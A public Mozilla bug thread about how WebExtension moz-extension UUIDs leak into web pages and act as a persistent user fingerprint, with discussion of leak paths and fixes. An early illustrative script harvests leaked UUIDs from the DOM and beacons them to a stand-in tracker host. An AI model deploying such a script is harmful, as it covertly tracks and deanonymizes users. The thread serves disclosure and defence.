Open Bug 1372288 Opened 7 years ago Updated 2 months ago

[meta] WebExtensions can be used as user fingerprint

Categories

(WebExtensions :: General, enhancement, P3)


Tracking

(Not tracked)

People

(Reporter: iskander.sanchez, Unassigned)

References

(Depends on 3 open bugs, Blocks 1 open bug)

Details

(4 keywords, Whiteboard: [fingerprinting][fp-triaged])

Attachments

(1 file)

User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/58.0.3029.110 Chrome/58.0.3029.110 Safari/537.36

Steps to reproduce:

Last year we reported a vulnerability to security@mozilla.org regarding
the possibility of enumerating/detecting all installed extensions using
a timing side-channel attack: "(Bug) Enumeration/detection of installed
add-ons of the user - WebExtensions". It looks like, in order to solve
this problem and perhaps other related ones, you recently changed the
URL used to access extension resources from
"moz-extension://<extension-id>/<path/to/resource>" to
"moz-extension://<random-UUID>/<path/to/resource>".

However, while this change makes fingerprinting of user extensions
somewhat more difficult, it has created a much more dangerous problem.
The random UUID can itself be used as a fingerprint of the user if it
is leaked by an extension, for example when it appears as the URL of a
CSS resource or iframe included in the website. We performed a quick
analysis and found some extensions that leak it (e.g., Night Shift Pro
or Spines Now). A website can retrieve this UUID and use it to uniquely
and precisely identify the user.
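For illustration, a minimal sketch of how a tracking script on a website could harvest a leaked UUID from extension-injected content (the selector and collection endpoint are hypothetical):

// Walk the DOM for elements whose URL points at an extension resource
for (const el of document.querySelectorAll("iframe[src], img[src], link[href]")) {
  const url = el.src || el.href;
  if (url && url.startsWith("moz-extension://")) {
    const uuid = new URL(url).host; // the per-profile random UUID
    navigator.sendBeacon("https://tracker.example/collect", uuid); // hypothetical endpoint
  }
}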

There are two fixes/changes that should be done to solve this problem:

1. Instead of generating a random UUID once per browser instance,
generate a new random UUID for each extension on every access. That
way the random UUID cannot be used as a user fingerprint, because it
changes every time.

2. Analyze extensions for these leaks before making them public on
Firefox Add-ons, and include advice for developers describing the
problems that leaking the generated random UUID can cause.
Group: firefox-core-security → toolkit-core-security
Component: Untriaged → WebExtensions: General
Product: Firefox → Toolkit
Whiteboard: [fingerprinting]
Just to check: is this because Night Shift Pro applies a stylesheet to the page in a content script by using document.createElement('link') instead of tabs.insertCSS()? Because it does that, a page can then access the injected link via document.styleSheets and find the unique ID of the extension?
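For reference, a minimal sketch of the two patterns (the file name and tabId are placeholders):

// Leaky pattern, in a content script: the injected <link> exposes moz-extension://<uuid>/
const link = document.createElement("link");
link.rel = "stylesheet";
link.href = browser.runtime.getURL("night.css");
document.head.appendChild(link);
// The page can now read link.href (or walk document.styleSheets) and extract the UUID.

// Safer pattern, from the extension's background script: no extension URL reaches the page.
browser.tabs.insertCSS(tabId, { file: "night.css" });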
Dan, can you make this bug public? This has been known and discussed publicly for as long as we've been doing UUID randomization, and is also the subject of a public USENIX paper[1]. I don't think there's any point in keeping it hidden.


[1]: https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-sanchez-rola.pdf
Flags: needinfo?(dveditz)
Group: toolkit-core-security
Flags: needinfo?(dveditz)
This completely defeats any anti-fingerprinting work we're doing (restricting access to resource://, the work to make web extension resources not content-accessible by default). Screenshots as described in the article requires user interaction to leak the fingerprint (and another later screenshot to check if it's the same profile), but if any other popular extension adds content to pages by default then it could lead to silent tracking and deanonymization.

The random UUID needs to be created at startup so that any tracking is limited to a session.
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to Daniel Veditz [:dveditz] from comment #4)
> This completely defeats any anti-fingerprinting work we're doing
> (restricting access to resource://, the work to make web extension resources
> not content-accessible by default). Screenshots as described in the article
> requires user interaction to leak the fingerprint (and another later
> screenshot to check if it's the same profile), but if any other popular
> extension adds content to pages by default then it could lead to silent
> tracking and deanonymization.
> 
> The random UUID needs to be created at startup so that any tracking is
> limited to a session.

On that basis do you think this should be considered a blocker for the Firefox 57 release? It seems like a pretty serious slip up.
Note that even if we generate the ID every session they could still be used to associate a Private Browsing context with a non-private context and allow 3rd-party trackers to reassociate cookies. Ditto across containers. Is there any sane way to generate a different resource ID per child process? Would require ugly mapping tables to live somewhere :-(
(In reply to Daniel Veditz [:dveditz] from comment #7)
> Is there any sane way to generate a different resource ID per child process?
> Would require ugly mapping tables to live somewhere :-(

Yes, but it would break extensions that expect URLs to be the same everywhere, and pass them around in messages. Ideally, I'd really like to use separate web-accessible URLs for each page load, but there's no way we could make that work without making it opt-in.
(In reply to Kris Maglione [:kmag] from comment #8)
> (In reply to Daniel Veditz [:dveditz] from comment #7)
> > Is there any sane way to generate a different resource ID per child process?
> > Would require ugly mapping tables to live somewhere :-(
> 
> Yes, but it would break extensions that expect URLs to be the same
> everywhere, and pass them around in messages. Ideally, I'd really like to
> use separate web-accessible URLs for each page load, but there's no way we
> could make that work without making it opt-in.

This may be a really, really silly idea but would it be possible to outright block access to the moz-extension protocol when not used from within the browser itself - block external requests to the protocol? This would prevent external things from accessing it, but I have no idea if this would even work or whether it would break things.

Again, it may be a really silly idea, but I figured I'd check anyway.
We can block some content loads depending on the triggering principal, but it gets dicey in a lot of circumstances, since there are only a few places where we actually keep track of the caller principal for dynamically-inserted content. So that would basically be blocked on bug 1267027.
(In reply to Kris Maglione [:kmag] from comment #8)
> (In reply to Daniel Veditz [:dveditz] from comment #7)
> > Is there any sane way to generate a different resource ID per child process?
> > Would require ugly mapping tables to live somewhere :-(
> 
> Yes, but it would break extensions that expect URLs to be the same
> everywhere, and pass them around in messages. Ideally, I'd really like to
> use separate web-accessible URLs for each page load, but there's no way we
> could make that work without making it opt-in.

If this was opt-in then we could opt in to it for Screenshots, probably with no code changes (looking at our use of getURL, we never send the result of that call to another process).
Priority: -- → P2
(In reply to Ian Bicking (:ianbicking) from comment #11)
> If this was opt-in then we could opt in to it for Screenshots, probably with
> no code changes (looking at our use of getURL, we never send the result of
> that call to another process).

The problem with making it opt-in is that it's a large amount of work, and an additional configuration to support, for something that's not likely to be used very often.

There are also issues for things like quota storage, which are tied to a particular extension URL, which we'd need to decide how to address before we could even begin working on that.
Another idea to solve the cookieStoreId issue raised by Dan is to reject loads based on IDs. This wouldn't really break any add-ons right now besides maybe a handful.

This means the extension would get a unique ID per container/PB mode for each path, and loads crossing into a different container would be rejected.

This would likely cause less breakage than per-page-load IDs.
The solution that John proposed in #security sounds at least sensible for a limited number of cases, i.e. censoring moz-extension:// URLs when accessed via iframe.src getters etc. Obviously this is somewhat hard to scale: there are tons of elements like iframe, link, a, img, etc., and also other ways to get access. Not even speaking about load events.
Sorry, s/John/Kris/, your IRC name...
Flags: sec-bounty?
(In reply to Limited Availabilty till Oct | Tom Schuster [:evilpie] from comment #14)
> Not even speaking about load events.

Load events aren't an issue. They don't propagate across origins for ordinary content code, and the only way web content would get access to the URL is by accessing the properties of the thing being loaded. In this case, that would be `iframe.src` or `iframe.contentWindow.location`, which are the things we would be sanitizing anyway.
(In reply to Daniel Veditz [:dveditz] from comment #7)
> Note that even if we generate the ID every session they could still be used
> to associate a Private Browsing context with a non-private context and allow
> 3rd-party trackers to reassociate cookies. Ditto across containers. Is there
> any sane way to generate a different resource ID per child process? Would
> require ugly mapping tables to live somewhere :-(

Also Tor Browser would be concerned that these UUIDs would violate first-party isolation. I'm not sure we have a separate child process for each container or first-party anyhow, unless I missed that development. Maybe we could provide a different UUID for each separate loading origin attribute hash?
If the cookie store solution in comment #13 works, comment #17 could likely be solved by using origin attributes to reject loads of extension URLs based upon the origin attributes they were loaded from.

The only issue I see with this is that some extensions would load from a background script, and that would never work in the context they tried to load it in.

This solution, however, wouldn't prevent the page from accessing a src/href attribute regardless of whether the load succeeds, right?
(In reply to Ryan Jones [:sciguyryan] from comment #9)
> This may be a really, really silly idea but would it be possible to outright
> block access to the moz-extension protocol when not used from within the
> browser itself - block external requests to the protocol?

We (kinda) already do that by requiring extensions to opt in to "web-accessible" -- everything is blocked by default. Things that are web-accessible are presumably used by extensions in web content (not always -- sometimes they're used in an extension's own pages). The size of the UUID basically prevents web content from probing for an extension by brute-force loading all possible UUIDs, so web content has to wait for the extension to inject some content with recognizable properties. Then it can inspect the content to see what its src= is.

Blocking this is not impossible to do: we do something similar when a page tries to find the document location on a cross-origin iframe. Firefox used to do this kind of access check on every DOM property and it was a performance nightmare, so we've pushed such checks out to document boundaries (using Cross-Compartment Wrappers). We'd have to find all the places that might return the resource URL and then if it's moz-extension:// throw a security error unless the calling context was also moz-extension:// (or chrome, of course).

Web content won't be expecting exceptions from checking a .src property (or equivalent). Maybe returning an empty string  is better (and a console warning?).

Despite the perf downsides (and I have no idea if they're significant) this kind of approach would at least solve the "first party isolation" issue. We'd have to carefully consider all the places such URLs could leak, though, and not miss any.
(In reply to Daniel Veditz [:dveditz] from comment #19)
> Web content won't be expecting exceptions from checking a .src property (or
> equivalent). Maybe returning an empty string  is better (and a console
> warning?).

I was thinking of adding a SanitizeURL helper that would convert them to something like "restricted:".

For the sake of Screenshots, the only places we have to worry about are `iframe.src` and `iframe.contentWindow.location`. We don't expose any other kind of web-accessible resource, and no other relevant cross-origin properties are accessible.

For the more general case, there are things like <img>.src, and potentially URLs in style rules and attributes that we could also try to sanitize, but it may be hard to do comprehensively.
web_accessible_resources has been available since Firefox 48, and it would be nice if ESR got this fixed as well.

If whatever you end up doing here is too complicated or impossible to backport, maybe you could fix this in a first step by using non-random UUIDs and then do the more complex stuff in a follow-up. That's not ideal, but still better than leaving ESR users exposed for another year. Thanks.
As an add-on developer, I just want to check whether this issue affects the following cases:

1. An add-on uses a content script to modify elements in the content page DOM (e.g. adding attributes).

2. An add-on uses a content script to insert new elements into the content page DOM. The new elements are not <frame>s or <iframe>s and do not have 'src' attributes.

3. An add-on has a web_accessible_resource (.html file) that is loaded by a content script using an XMLHttpRequest GET request. The responseText is parsed using DOMParser() parseFromString() and the resulting document is appended to a <div> created in the content page DOM.

4. An add-on has a web_accessible_resource (.js file) that is loaded by a content script using an XMLHttpRequest GET request. The responseText is saved in string variable and later converted to a Blob and saved to a file.

5. A script in the content page creates a Blob from binary data embedded in the script. The script creates a Blob URL referencing the Blob data. The Blob URL is then inserted as the 'src' URL for an image/audio/video element in the content page.
[Note: This case has been included in case the generated Blob URL could also be used as a fingerprint].

Could any of these cases leak the UUID or anything else that could be used as a fingerprint ?
Here is my solution for this problem using crypto. (I am not a cryptographer)

<evilpie> John-Galt: so I have been thinking about the UUID issue, I think we would use encryption instead of hashing
<•John-Galt> evilpie: Why?
<evilpie> ie E(uuid || nonce) or E(uuid || origin)
<evilpie> then we could decrypt and extract the uuid everywhere
<•John-Galt> Hm. Interesting idea.
<•John-Galt> I guess we'd need to keep track of valid nonces, and teach the storage code to map those to an actual origin string correctly...
<evilpie> I think we could throw away the nonce, we just have to check if it's a valid uuid
<•John-Galt> But not something we can do quickly. We'll probably still need to do the URL access check thing for 56 or 57
<•John-Galt> Well, we'd need the tokens to expire so sites couldn't still query for the old URLs to narrow down a user based on existing fingerprint data
<•John-Galt> I guess we could just use an expiry time
<evilpie> John-Galt: oh the encryption key would change on every start
<•John-Galt> No... that would break things
<•John-Galt> evilpie: That's a start, but wouldn't we want per-origin nonces?
<•John-Galt> And per-container... Cross-container queries would still be an issue, too, or cross-origin
<evilpie> yeah either that or even nonce per getURL call
<evilpie> the downside of course is the decryption perf might become a bottleneck
<•zombie> i like that!
<evilpie> so you either want something a bit less random to allow caching
Can't screenshots (and other concerned add-ons) work around this problem by creating blob URLs for the resources they need instead of directly loading the moz-extension stuff? I understand that origins might make this tricky for subresource loads (images/styles/scripts loaded by the iframe in question) but it is in principle doable, right?

Otherwise, it seems we have these constraints (can someone check if this is an accurate and thorough list?):

- add-ons expect their urls to be portable/consistent. This makes having different urls for different containers / private / non-private browsing difficult (impossible?) to do without breaking add-on compat, because then loads done by those add-ons will fail unexpectedly if they use the "wrong" url. While opt-in mechanisms allow a possible way out of this constraint, it wouldn't fix all add-ons and it only takes 1 non-"fixed" add-on to fingerprint the user.
- add-ons expect framing content marked web-accessible to work, so we can't block triggering moz-extension: loads from the web in all cases (even if we don't allow cross-origin access to the contents of the DOM window / image / whatever), and we don't currently have an intra-DOMWindow way of segregating origin/principal information (ie we can't distinguish a website creating a DOM <img> node trying to load a moz-extension URI from one created by the add-on in the same DOM window, so we can't allow loads for one and not the other).
-- we can't use non-high-entropy identifiers within moz-extension URLs because the subpaths in the add-on are known (ie a webpage can try loading moz-extension://<nonce>/noscript.js [or similar] if they have any workable nonce to figure out if that add-on is actually noscript, which we don't want to allow)
- for websites, we want the urls to expose no fingerprintable information, neither of the user nor the add-on (so having exposed, permanent ids per add-on across users is a no-go because that would expose the add-on, and having exposed, permanent, unique ids per add-on per user is a no-go because that exposes the user).

Given these constraints, it does seem to me that censoring the sensitive parts of the URI depending on the accessing principal (which we *do* know how to distinguish, I believe, because wrappers etc.) would be the easiest, even if there might be a long tail of accesses that we'd need to fix (ie. comment 20).

Of course, given bug 1389707 I'm not sure if screenshots should continue to have in-content UI like this -- but there'll always be other add-ons that want this, I expect...
Whiteboard: [fingerprinting] → [fingerprinting][fp:m4]
Besides the obvious case of referencing extension resources in the DOM, there are also other ways to leak the UUID:
- Firefox 56+ (bug 1380186): Via response.url in fetch and responseURL in XMLHttpRequest.
- Whenever the window.postMessage API is used from an extension frame (via event.origin).

(this list is not exhaustive)
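To illustrate the postMessage item above, a rough sketch (the message payload is arbitrary):

// In an extension page loaded in a frame on a web page:
window.parent.postMessage("ready", "*");

// In the hosting web page:
window.addEventListener("message", (event) => {
  if (event.origin.startsWith("moz-extension://")) {
    const uuid = event.origin.slice("moz-extension://".length); // the per-profile UUID
  }
});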


For add-ons who want to open extension resources in frames without leaking the uuid, do something like this:

var f = document.createElement("iframe");
document.body.appendChild(f);
f.contentWindow.location = chrome.extension.getURL("/some_web_accessible_page.html");
(In reply to Rob Wu [:robwu] from comment #25)
> For add-ons who want to open extension resources in frames without leaking
> the uuid, do something like this:
> 
> var f = document.createElement("iframe");
> document.body.appendChild(f);
> f.contentWindow.location =
> chrome.extension.getURL("/some_web_accessible_page.html");

That won't help. window.location is cross-origin readable.
(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #26)
> (In reply to Rob Wu [:robwu] from comment #25)
> > For add-ons who want to open extension resources in frames without leaking
> > the uuid, do something like this:
> > 
> > var f = document.createElement("iframe");
> > document.body.appendChild(f);
> > f.contentWindow.location =
> > chrome.extension.getURL("/some_web_accessible_page.html");
> 
> That won't help. window.location is cross-origin readable.

window.location permits the setter to be cross-origin, but the getter is protected by the same-origin policy.
Huh. Apparently you are correct. The `location` property is cross-origin readable, but its href property is only cross-origin writable, and its stringifier is same origin.
See Also: → 1405971
Priority: P2 → P1
(In reply to Rob Wu [:robwu] from comment #25)
> For add-ons who want to open extension resources in frames without leaking
> the uuid, do something like this:
> 
> var f = document.createElement("iframe");
> document.body.appendChild(f);
> f.contentWindow.location =
> chrome.extension.getURL("/some_web_accessible_page.html");

Nice to know that I can work around this bug in my extension. This workaround should be documented somewhere on MDN.
Whiteboard: [fingerprinting][fp:m4] → [fingerprinting][fp:m4][fp-triaged]
Assignee: nobody → kmaglione+bmo
:Kwan highlighted another fingerprinting possibility: we now send the Origin header in XHR, which contains the extension's address. We could choose to strip this header for the moz-extension: protocol; the site could then know that a request came from an extension, but not which one.
The Origin header issue is bug 1257989 (the bug just talks about websockets, but the issue applies to any http request from a page including XHR/fetch)
How about returning a randomized URL from `extension.getURL` when called in a content script? It could return a fixed one in the background page for sending to other scripts. Extensions could opt out (but get a warning). This opt-out could be deprecated and removed in the future. Extensions that need more control over URI stability could use blob URIs.

(In reply to :Gijs from comment #24)
> Of course, given bug 1389707 I'm not sure if screenshots should continue to
> have in-content UI like this -- but there'll always be other add-ons that
> want this, I expect...

As a peasant who does not have access, I can't be certain what that is about, but I have to say that in-content UIs are simply a workaround for the lack of power of WebExtension APIs. Bootstrapped and SDK extensions had access to more powerful UI primitives such as anonymous content overlays, detached panels and so on, so they were never at the mercy of web content.

If bug 1340930 and bug 1364404 were implemented, add-on devs could significantly reduce the fingerprinting surface exposed to content. Shadow DOM may also help to some extent, although it's not as airtight.
Whiteboard: [fingerprinting][fp:m4][fp-triaged] → [tor][fingerprinting][fp:m4][fp-triaged]
Why do websites need access to UUID's of extensions?  This should be default-off for all extensions.  If an extension wants to give a website access to its UUID, it can create a short whitelist of allowed sites where (*) is not an option.
(In reply to Tanvi Vyas[:tanvi] from comment #33)
> Why do websites need access to UUID's of extensions?  This should be
> default-off for all extensions.  If an extension wants to give a website
> access to its UUID, it can create a short whitelist of allowed sites where
> (*) is not an option.

They don't, as such. The issue is that when extensions inject resources into content pages, the URLs of those resources are usually content-observable. And when it's an extension URL, that gives the sites a unique client ID. A whitelist wouldn't help with that, since this only becomes an issue when extensions actively inject content in observable ways.

There are ways for extensions to work around this (for instance, relying on iframes with srcdoc contents, or URLs set using contentWindow.location), though.

The other issue is that once a website has access to an internal UUID, it can later poll to see which URLs load, and use that to narrow down a user's identity. My plan for that issue is to make those resources only loadable by extension triggering principals. We're almost at the point where we can do that.
(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #34)
> There are ways for extensions to work around this (for instance, relying on
> iframes with srcdoc contents, or URLs set using contentWindow.location),
> though.

srcdoc will make another (probably even worse) problem, because web pages can read the *content* of the iframe via the value of srcdoc attribute.
(In reply to Masatoshi Kimura [:emk] from comment #35)
> srcdoc will make another (probably even worse) problem, because web pages
> can read the *content* of the iframe via the value of srcdoc attribute.

No, they can only read the initial content. Once the document loads, the extension content script has access to its contents, but web content does not.
(In reply to Kris Maglione [:kmag] (long backlog; ping on IRC if you're blocked) from comment #36)
> (In reply to Masatoshi Kimura [:emk] from comment #35)
> > srcdoc will make another (probably even worse) problem, because web pages
> > can read the *content* of the iframe via the value of srcdoc attribute.
> 
> No, they can only read the initial content. Once the document loads, the
> extension content script has access to its contents, but web content does
> not.

You are right that web pages can only read the initial content. But extension developers would have to be very careful to design the initial content so that it doesn't expose sensitive information. Even if they did, the initial content would still have high enough entropy for web pages to identify the extension and its version. There is no reason to use it in preference to contentWindow.location.
Assignee: kmaglione+bmo → nobody
Hey David, P1 unassigned.  Do you have a sense of where this sits in your team's queue currently?
Flags: needinfo?(ddurst)
We need to discuss that next week. I'm not sure who decides on the approach -- and there will be more to do depending on the approach. I would like to have this fixed in Q2, but...
Flags: needinfo?(ddurst)
Priority: P1 → P2
Product: Toolkit → WebExtensions
We discussed this during the last all hands and came to two conclusions:

1) It's going to be largely the responsibility of extensions to avoid leaking their UUIDs to content pages.
2) We probably want to prevent content pages from loading extension URLs directly, and only allow extension content to be injected by extensions directly. That wouldn't prevent pages from fingerprinting when extensions explicitly inject things into pages, but it would prevent them from probing for known extension URLs when they already have a guess at the identity of the user.
(In reply to Kris Maglione [:kmag] from comment #40)
> We discussed this during the last all hands and came to two conclusions:
> 
> 1) It's going to be largely the responsibility of extensions to avoid
> leaking their UUIDs to content pages.

Is there any way we can automate or detect using static analysis that an extension is going to wind up leaking the UUID?
(In reply to Tom Ritter [:tjr] from comment #41)
> (In reply to Kris Maglione [:kmag] from comment #40)
> > We discussed this during the last all hands and came to two conclusions:
> > 
> > 1) It's going to be largely the responsibility of extensions to avoid
> > leaking their UUIDs to content pages.
> 
> Is there any way we can automate or detect using static analysis that an
> extension is going to wind up leaking the UUID?

I doubt it. Fetching URLs that contain the UUID isn't always wrong, but once an add-on does that somewhere, we'd have to track 'tainted' content and make sure it never makes it into a DOM loaded in a browser (and then check that said DOM isn't only ever pages that belong to that add-on in the first place, and/or whether any foreign script has access to said DOM).
Prevent it, randomly generate each time used, or return something less unique. Any of these sound like good ways to address it.
(In reply to jwms from comment #43)
> Prevent it, randomly generate each time used, or return something less
> unique.

Unfortunately, it's not that simple.
(In reply to Kris Maglione [:kmag] from comment #40)
> We discussed this during the last all hands and came to two conclusions:
> 
> 1) It's going to be largely the responsibility of extensions to avoid
> leaking their UUIDs to content pages.
> 2) We probably want to prevent content pages from loading extension URLs
> directly, and only allow extension content to be injected by extensions
> directly. That wouldn't prevent pages from fingerprinting when extensions
> explicitly inject things into pages, but it would prevent them from probing
> for known extension URLs when they already have a guess at the identity of
> the user.


Then the user must be informed when an add-on could potentially be fingerprinted, based on comment #42. Pretty sure there's a permission about add-ons injecting content into webpages, does that permission include what we are talking about here. If so, might want to make it separate.

Reason: As a user relying on anti-fingerprinting protection, on a browser soon to integrate Tor through the Fusion project, I want to trust that my add-ons will not sell me out.
> Reason: As a user relying on anti-fingerprinting protection, on a browser
> soon to integrate Tor through the Fusion project, I want to trust that my
> add-ons will not sell me out.

(Failing trust, I am bound to install as few add-ons as possible even though I would benefit in comfort and workflow if I did install more add-ons.)
(In reply to Jon Irenicus from comment #45 and comment #46)
> Then the user must be informed when an add-on could potentially be
> fingerprinted, based on comment #42. Pretty sure there's a permission about
> add-ons injecting content into webpages, does that permission include what
> we are talking about here. If so, might want to make it separate.
> 
> Reason: As a user relying on anti-fingerprinting protection, on a browser
> soon to integrate Tor through the Fusion project, I want to trust that my
> add-ons will not sell me out.
> 
> (Failing trust, I am bound to install as few add-ons as possible even though
> I would benefit in comfort and workflow if I did install more add-ons.)

I know that there are some extensions which just inject their stylesheets through `<link rel="stylesheet" href="moz-extension://{uuid}/stylesheet.css">`, which is easily detectable by websites, rather than through `"content_scripts": [{"css": ["stylesheet.css"]}]`, which is nearly undetectable by websites.

Case in point: https://addons.mozilla.org/firefox/addon/s3download-statusbar/
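For comparison, a minimal manifest.json sketch of the content_scripts approach (the match pattern is illustrative):

"content_scripts": [
  {
    "matches": ["<all_urls>"],
    "css": ["stylesheet.css"]
  }
]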
(In reply to Jon Irenicus from comment #45)
> Reason: As a user relying on anti-fingerprinting protection, on a browser
> soon to integrate Tor through the Fusion project, I want to trust that my
> add-ons will not sell me out.

When Fusion gets closer, we'll be looking at the add-on concern very carefully. Chrome, for example, disables extensions in Incognito mode unless you explicitly turn them on. I have no idea what we'll do here except to say "We need to think about it carefully." Maybe this bug will be fixed by then; maybe we'll fix it as part of Fusion.

I would also add that our anti-fingerprinting protection is good, but far from perfect. Feel free to use it as a best-effort experimental feature, but know there are still fingerprintable information leaks in it.
This is a legitimate privacy issue but not a security vulnerability of the sort covered by the bug bounty program.
Flags: sec-bounty? → sec-bounty-
Whiteboard: [tor][fingerprinting][fp:m4][fp-triaged] → [tor][fingerprinting][fp:m4]
No longer blocks: uplift_tor_fingerprinting
Whiteboard: [tor][fingerprinting][fp:m4] → [fingerprinting][fp-triaged]
Whiteboard: [fingerprinting][fp-triaged] → [fingerprinting][fp-triaged][webext?]

We're going to convert this over to a meta and try to chip away at this over time.

Keywords: meta
Priority: P2 → P3
Summary: WebExtensions UUID can be used as user fingerprint → [meta] WebExtensions can be used as user fingerprint
Whiteboard: [fingerprinting][fp-triaged][webext?] → [fingerprinting][fp-triaged]
Depends on: 1364404
Flags: needinfo?(m7md.alfdyly33)
Flags: needinfo?(m7md.alfdyly33)

any workaround?

Depends on: 1717671

Actually it is pretty difficult to not expose the UUID whenever you want to add any content to other websites.

Making it random makes it more difficult to probe for specific extensions and thereby get a list of installed add-ons. But if the random UUID is exposed, it perfectly identifies this exact Firefox installation.

What do people think about this workaround until something better is found:

It should be possible to combine webRequest.onBeforeRequest and webRequest.filterResponseData to "fake" some host name, which then is used as the source for the contents you want to embed. This still allows websites to know that a specific Add-on is used, but at least does not expose some unique identifier which never changes until you uninstall and reinstall the Add-on.

I'm asking because I updated my Add-on https://addons.mozilla.org/android/addon/android-pdf-js/ to use "filterResponseData" to make it possible to view a PDF on Android while keeping the address to it in the address bar. This is absolutely cool. Feels like on Desktop where Firefox has this built in. But now I'm unsure if I should keep it this way or go back to my "old way" which was redirecting from the PDF address to the moz-extension:// URL. Way less cool but the redirect makes it actually impossible for the website to know that the redirect happened, as now the PDF viewer is a different origin and so no longer accessible from the original host.
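A rough sketch of the filterResponseData approach described above, from a background script with the webRequest, webRequestBlocking, and matching host permissions (the URL pattern and placeholder HTML are assumptions):

browser.webRequest.onBeforeRequest.addListener((details) => {
  // Rewrite the response body in place: the address bar keeps the original URL,
  // so no moz-extension:// URL (and therefore no UUID) is exposed to the page.
  const filter = browser.webRequest.filterResponseData(details.requestId);
  filter.onstart = () => {
    const html = "<!DOCTYPE html><html><body><!-- viewer UI here --></body></html>";
    filter.write(new TextEncoder().encode(html));
    filter.close();
  };
}, { urls: ["*://*/*.pdf"], types: ["main_frame"] }, ["blocking"]);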

(In reply to Manuel Reimer from comment #52)

Actually it is pretty difficult to not expose the UUID whenever you want to add any content to other websites.

It's possible to insert content without exposing the UUID by using closed shadow DOM, see https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_shadow_DOM

It should be possible to combine webRequest.onBeforeRequest and webRequest.filterResponseData to "fake" some host name, which then is used as the source for the contents you want to embed. This still allows websites to know that a specific Add-on is used, but at least does not expose some unique identifier which never changes until you uninstall and reinstall the Add-on.

I'm asking because I updated my Add-on https://addons.mozilla.org/android/addon/android-pdf-js/ to use "filterResponseData" to make it possible to view a PDF on Android while keeping the address to it in the address bar. This is absolutely cool. Feels like on Desktop where Firefox has this built in. But now I'm unsure if I should keep it this way or go back to my "old way" which was redirecting from the PDF address to the moz-extension:// URL. Way less cool but the redirect makes it actually impossible for the website to know that the redirect happened, as now the PDF viewer is a different origin and so no longer accessible from the original host.

You'll probably be interested in bug 1712096.
For your specific use case, bug 1457500 would be more appropriate.

(In reply to Manuel Reimer from comment #53)

I did some testing, and while the embedded PDF.js in desktop Firefox somehow is "a different origin", this does not work with "filterResponseData". That means if I open a PDF in a new window, I can access the content with my version but not on desktop Firefox.

Can I somehow get the same with an WebExtension? Can I somehow mark my changed website as "protected" just as Firefox does it with PDF.js on the desktop version?

Generalizing the logic of PDF.js to an extension API is not something that's actively being worked on, but it would be covered by bug 1457500.

PS. Please stop commenting on this bug about your extension; it's unrelated to the topic of the bug and results in bugmail to many people.

(In reply to Rob Wu [:robwu] from comment #54)

It's possible to insert content without exposing the UUID by using closed shadow DOM, see https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_shadow_DOM

I have heard that the closed shadow DOM is not a security boundary. That is, even if the closed shadow DOM "leaks" the shadow DOM content, it would not be considered as a security vulnerability. So I had to resort to cross-origin iframe. Is that changed?

(In reply to Masatoshi Kimura [:emk] from comment #55)

(In reply to Rob Wu [:robwu] from comment #54)

It's possible to insert content without exposing the UUID by using closed shadow DOM, see https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_shadow_DOM

I have heard that the closed shadow DOM is not a security boundary. That is, even if the closed shadow DOM "leaks" the shadow DOM content, it would not be considered as a security vulnerability. So I had to resort to cross-origin iframe. Is that changed?

(Closed) shadow DOM does NOT provide full isolation, and it's very easy to inadvertently leak references to its content. Extensions have access to an execution environment isolated from the web page (content scripts), which enables them to load a subresource (e.g. moz-extension:-frame) in a shadow tree, without inadvertently leaking the extension URL. If you have a counter-example that shows a leak of the UUID under this construction, please let me know and I'll stop mentioning this option.
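A minimal sketch of that construction from a content script, combining a closed shadow root with the contentWindow.location trick from comment 25 (the page name is a placeholder and would need to be listed under web_accessible_resources):

// The closed shadow root reference lives only in the content script's isolated
// scope, so the page cannot traverse into the injected content.
const host = document.createElement("div");
const shadow = host.attachShadow({ mode: "closed" });
const frame = document.createElement("iframe");
shadow.appendChild(frame);
document.body.appendChild(host);
// Set the URL via contentWindow.location so it never appears in a readable attribute.
frame.contentWindow.location = browser.runtime.getURL("panel.html");
// The page sees host.shadowRoot === null and holds no reference to `frame` or `shadow`.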

Depends on: 1257989

This issue becomes much more relevant when these UUIDs can be discovered by a Spectre-attacker enumerating a content process' address space. Making the UUIDs unique-per-session would help a lot, but that's still not ideal.

Blocks: 1707955

(In reply to Tom Ritter [:tjr] from comment #57)

This issue becomes much more relevant when these UUIDs can be discovered by a Spectre-attacker enumerating a content process' address space. Making the UUIDs unique-per-session would help a lot, but that's still not ideal.

I wonder how much we can realistically mitigate fingerprinting with Spectre... We have enough identifying information in the content process as it is, and when extensions are involved, I'd expect a lot of them to send identifying information of their own.

In any case, I'm not sure we can realistically change this at this point. It was hard enough to get developers to use APIs to get their base URL rather than hard-coding it, as they were used to doing under Chrome. But I know for a fact that there are extensions that generate HTML for their UI and cache it across sessions (I have at least seen TreeStyleTab doing it), and if their base URL changes, I'm sure that some of that HTML will break.

Severity: normal → S3
Whiteboard: [fingerprinting][fp-triaged] → [fingerprinting][fp-triaged][sp3]
Whiteboard: [fingerprinting][fp-triaged][sp3] → [fingerprinting][fp-triaged]